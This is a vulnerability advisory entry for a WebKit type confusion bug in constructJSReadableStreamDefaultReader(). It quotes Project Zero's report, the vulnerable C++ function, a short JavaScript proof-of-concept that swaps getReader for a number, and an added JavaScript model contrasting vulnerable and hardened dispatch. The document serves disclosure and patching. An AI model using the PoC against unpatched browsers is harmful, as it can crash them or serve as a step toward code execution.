Vendor: Webkit
By: Project Zero
CVSS: 8.8 (HIGH)
CWE: CWE-843 (Type Confusion)
Product Name: Webkit
Affected Version From: Webkit Nightly 10.0.2 (12602.3.12.0.1, r210800)
Affected Version To: Webkit Nightly 10.0.2 (12602.3.12.0.1, r210800)
Patch Exists: YES
Related CWE: CVE-2018-4233
CPE: a:apple:webkit
Year: 2018

EncodedJSValue JSC_HOST_CALL constructJSReadableStreamDefaultReader() Type Confusion Vulnerability

The constructJSReadableStreamDefaultReader() function in WebKit looks up the stream's getReader property and invokes it without first checking that the value is callable. A page can exploit this by overwriting getReader on a ReadableStream object with an arbitrary non-function value and then calling the reader object's constructor with that ReadableStream as its argument; the engine then dispatches a call on a non-callable value, which leads to type confusion and can lead to arbitrary code execution.

Mitigation:

Upgrade to the latest version of Webkit Nightly

Exploit-DB raw data:

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1085

EncodedJSValue JSC_HOST_CALL constructJSReadableStreamDefaultReader(ExecState& exec)
{
    VM& vm = exec.vm();
    auto scope = DECLARE_THROW_SCOPE(vm);

    JSReadableStream* stream = jsDynamicDowncast<JSReadableStream*>(exec.argument(0));
    if (!stream)
        return throwArgumentTypeError(exec, scope, 0, "stream", "ReadableStreamReader", nullptr, "ReadableStream");

    JSValue jsFunction = stream->get(&exec, Identifier::fromString(&exec, "getReader")); <<--- 1

    CallData callData;
    CallType callType = getCallData(jsFunction, callData);
    MarkedArgumentBuffer noArguments;
    return JSValue::encode(call(&exec, jsFunction, callType, callData, stream, noArguments));
}

It doesn't check whether |getReader| is callable or not.

PoC:
-->

let rs = new ReadableStream();
let cons = rs.getReader().constructor;

rs.getReader = 0x12345;
new cons(rs);

<!--
Tested on Webkit Nightly 10.0.2(12602.3.12.0.1, r210800)
-->
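The missing callable check, from both the description above and the bug report's constructJSReadableStreamDefaultReader() listing, modeled in JavaScript as an added example that is not WebKit or Project Zero code. CallType, getCallData(), call() and ModelReadableStream are deliberately simplified stand-ins for the JSC internals (assumed names), and the "UNSAFE" error stands for the memory-unsafe dispatch the real engine would perform; the hardened variant shows where the check belongs.

```javascript
// Added model of the JSC host-call dispatch path; not WebKit code.
// CallType mirrors what JSC's getCallData() reports: a value that is
// not callable yields CallType.None (modeled names, not the real enum).
const CallType = Object.freeze({ None: 0, Host: 1, JS: 2 });

// getCallData(): report whether a JS value can be called at all.
function getCallData(value) {
  return typeof value === "function" ? CallType.JS : CallType.None;
}

// Stand-in for JSC's call(): in the engine, dispatching with CallType::None
// treats a non-callable cell as a function (the type confusion). The model
// surfaces that unsafe state as a plain Error so a test can observe it.
function call(fn, callType, thisValue, args) {
  if (callType === CallType.None) {
    throw new Error("UNSAFE: call() reached with a non-callable value");
  }
  return fn.apply(thisValue, args);
}

// Minimal stream model whose getReader() the PoC pattern overwrites.
class ModelReadableStream {
  getReader() { return { stream: this }; }
}

// Vulnerable shape (as in r210800): look up getReader, dispatch unconditionally.
function constructReaderVulnerable(stream) {
  if (!(stream instanceof ModelReadableStream)) throw new TypeError("stream is not a ReadableStream");
  const jsFunction = stream.getReader;
  const callType = getCallData(jsFunction);
  return call(jsFunction, callType, stream, []);
}

// Hardened shape: refuse a non-callable getReader before any dispatch happens.
function constructReaderHardened(stream) {
  if (!(stream instanceof ModelReadableStream)) throw new TypeError("stream is not a ReadableStream");
  const jsFunction = stream.getReader;
  const callType = getCallData(jsFunction);
  if (callType === CallType.None) throw new TypeError("getReader is not a function");
  return call(jsFunction, callType, stream, []);
}

// Regression check: what does a constructor do once getReader has been
// replaced by a non-callable value (the constructed value 0x12345 from the PoC)?
function outcome(construct) {
  const rs = new ModelReadableStream();
  rs.getReader = 0x12345;
  try { construct(rs); return "reader"; }
  catch (e) { return e instanceof TypeError ? "TypeError" : e.message; }
}
```

A patched engine is expected to behave like constructReaderHardened: the PoC pattern ends in a JavaScript TypeError rather than reaching the dispatch path.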